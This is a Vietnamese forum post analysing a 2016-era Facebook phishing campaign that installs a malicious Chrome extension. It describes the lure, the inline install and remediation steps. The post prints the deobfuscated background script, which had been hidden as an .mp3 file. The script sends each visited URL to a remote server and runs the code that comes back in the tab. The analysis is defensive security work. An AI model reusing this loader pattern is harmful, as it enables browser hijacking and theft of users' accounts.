Phân tích mã độc mới trên Facebook 15/11 (P1)
Hôm nay trên Facebook thấy mọi người chia sẻ rất nhiều cái bài cảnh báo gì đó về một kiểu Hack tài khoản Facebook mới có dạng kiểu ai đó "đã nhắc đến bạn trong một bình luận".
Ở thời điểm hiện tại, khi nhấn vào thông báo thì bạn sẽ nhận được cảnh báo từ Facebook:
Để có thể viết bài phân tích cho các bạn, tôi sẽ nhấn vào Truy cập liên kết. Tuy nhiên các bạn hãy vào Quay lại để đảm bảo an toàn cho bản thân!
Sau khi nhấn vào thông báo, thay vì chuyển hướng tới bình luận như mọi khi thì người dùng sẽ bị chuyển hướng sang một trang web có giao diện giống hệt Facebook.
Dù đây là tấn công theo phương thức Phishing nhưng không phải kiểu thông thường mà chúng ta thường gặp là nhái trang đăng nhập. Lần này nó sẽ hiển thị một trang xem video như trên Facebook.
Sau khi truy cập khoảng 5 giây sẽ có một thông báo yêu cầu cài đặt Extension vào trình duyệt. Tại sao trang web có thể hiển thị thông báo như khi bạn nhấn nút cài đặt Extension trên Chrome Store? Đó là vì kẻ tấn công đã sử dụng phương thức Cài đặt nội tuyến (Inline Installation).https://developer.chrome.com/webstore/in...stallation
Tất nhiên là tôi sẽ không cài đặt rồi. Bằng một số thủ thuật tìm thấy trên Google, tôi tải được tập tin CRX (đuôi mở rộng của Extension) về máy.
Phân tích mã độc
CRX thực chất là một định dạng nén đặc biệt của Extension, giống như đuôi JAR của tập tin JAVA. Tức là ta có thể xem nội dung bên trong như một tập tin nén thông thường.
Trong phần mở rộng này có một tập tin khá đặc biệt là 639040963078.mp3 (tập tin MP3 rất ít khi được sử dụng trong Extension). Quét thử với Virus Total thì kết quả có vẻ cũng không "nguy hiểm" lắm.
Tôi liền mở tập tin manifest.json ra coi. Đây là tập tin chứa các thông tin cơ bản và quyền hạn của một Extension.
Phần quyền hạn (permission) có vẻ khá nhạy cảm. Nó quản lý các tab và mọi trang web mà bạn truy cập (kể cả trang web đó sử dụng giao thức bảo mật HTTPS).
Nhưng có một điểm thú vị hơn là phần kịch bản chạy nền (background):
Trích dẫn:"background":{
"scripts":["639040963078.mp3"]
}
Tại sao tôi lại nói là thú vị? Vì phần này khai báo HTML hoặc JavaScript nhưng tác giả của Extension lại trỏ vào tập tin *.mp3
Tôi liền đổi đuôi tập tin 639040963078.mp3 thành 639040963078.js và mở lên xem nội dung.
Đoạn mã đã được làm rối (Obfuscated), tuy nhiên mã khá ngắn nên không tốn nhiều thời gian lắm để lấy lại đoạn mã ban đầu:
Trích dẫn:window.chrome.tabs.onUpdated.addListener(function(wyqhrr) {
window.chrome.tabs.get(wyqhrr, function(tab) {
if (tab.status == 'complete') {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://xxx.xyz/z.php?url=' + tab.url, true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
window.chrome.tabs.executeScript(tab.id, {
code: xhr.responseText
});
}
}
xhr.send();
}
})
})
Chú ý: Tên miền trong đoạn mã chứa mã độc nên tôi đã ẩn.
Đoạn mã trên sẽ lắng nghe sự kiện mỗi khi người dùng mở tab mới hoặc tab được điều hướng. Khi sự kiện này xảy ra nó sẽ thực thi một đoạn mã độc từ xa. Nội dung mã độc mới được lấy thông qua Ajax.
Bài viết cũng đã khá dài. Tôi sẽ tiếp tục phân tích đoạn mã độc được thực thi trong phần 2.
Nguồn : https://blog-j2team.rhcloud.com
****************************************************************
Tôi bổ sung thêm : Cách thức hack nick mới trên facebook bằng tag tên và cách khắc phục
Theo ghi nhận thì trong hôm nay 15/11 có một số bạn đã báo cáo tình trạng tài khoản facebook bị hack hàng loạt do một cách thức hack nick hoàn toàn mới tại Việt Nam
Bài viết sau đây sẽ giúp bạn tìm hiểu và cách phòng tránh khỏi cách hack nick này. Hãy chia sẽ với bạn bè và người thân nếu thấy bài viết này bổ ích nhé
Theo nguồn tin mới nhất thì đoạn mã độc nãy đến từ một nới có dãy IP của Pháp. Mời bạn đọc kỹ bài viết để tìm hiểu và phòng tránh
Cách thức hoạt động
Đầu tiên mình nhận được 1 thông báo đến từ facebook là có bạn mình đã nhắc tới trong 1 bài viết – hoặc trong 1 bình luận
Mọi thứ đều rất bình thường nên không ai chú ý và vẫn tiếp tục bấm vào thông báo để xem. Sau khi bấm vào thông báo nó sẽ chuyển hướng đến một trang web có giao diện y hệt như facebook nhưng nếu các bạn chú ý trên thanh url thì đây là một website hoàn toàn giả mạo. Và trên trang “facebook giả ” này hiện ra một thông báo khiến đa phần người dùng sẽ nhấn vào mà không mải may nghi ngờ
Sau khi nhấn vào bất cứ vị trí nào trên website thì lập tức trình duyệt của các bạn sẽ bị cài 1 tiện ích có tên là “BUZ” .
Theo mình nghiên cứu thì tiện ích này có khả năng thu thập và thay đổi thông tin tài khoản của bạn như thay đổi email và tiến hành đăng nhập trái phép tài khoản facebook. Nó còn có khả năng thu thập các dữ liệu được lưutrên trình duyệt của bạn. Hiện tại đoạn mã độc này nếu khi click vào thì có 2 trường hợp xảy ra
1 : Trên PC: Chuyển hướng đến trang cài đặt ứng dụng BUZ vô nguy hiểm này
2 : Trên Di động hoặc tablet : Chuyển hướng đến trang kiểm tiền của kẻ phát tán: có thể là câu view để kiếm tiền thông qua các mạng quảng cáo
Trong vòng vài tiếng đồng hồ. Kẻ hack nick sẽ tiến hành lấy nick facebook của bạn mà bạn không hay biết.
2. Khắc phục
Nếu các bạn gặp phải tình trạng viết trên và lỡ bấm vào link thì nên làm các bước sau đây để bảo mật lại tài khoản :
Truy cập menu cài đặt trên facebook và kiểm tra xem có email hoặc số điện thoại nào lạ vừa được thêm vào tài khoản của bạn không. Nếu có thì tiến hành gỡ bỏ ngay email hoặc sdt lạ đó
Truy cập phần tiện ích của trình duyện bạn đang sử dụng và kiểm tra xem có tiện ích nào lạ mà bạn không tự tay cài vào không. Nếu có thì gỡ ra ngay
Sau khi kiểm tra nếu phát hiện 1 trong 2 trường hợp trên thì các bạn tiến hành đổi mật khẩu facebook ngay vì có thể kẻ gian đã có được mật khẩu hay token của bạn.
Cám ơn các bạn đã đọc. hãy share để bạn bè và người thân tránh khỏi nhé ! Nhấn vào nút bên dưới để chia sẽ lên facebook ngay
Nguồn: http://forum.ceh.vn/Phan-tich-ma-doc-moi-tren-Facebook-1511-P1-thread-7801.ceh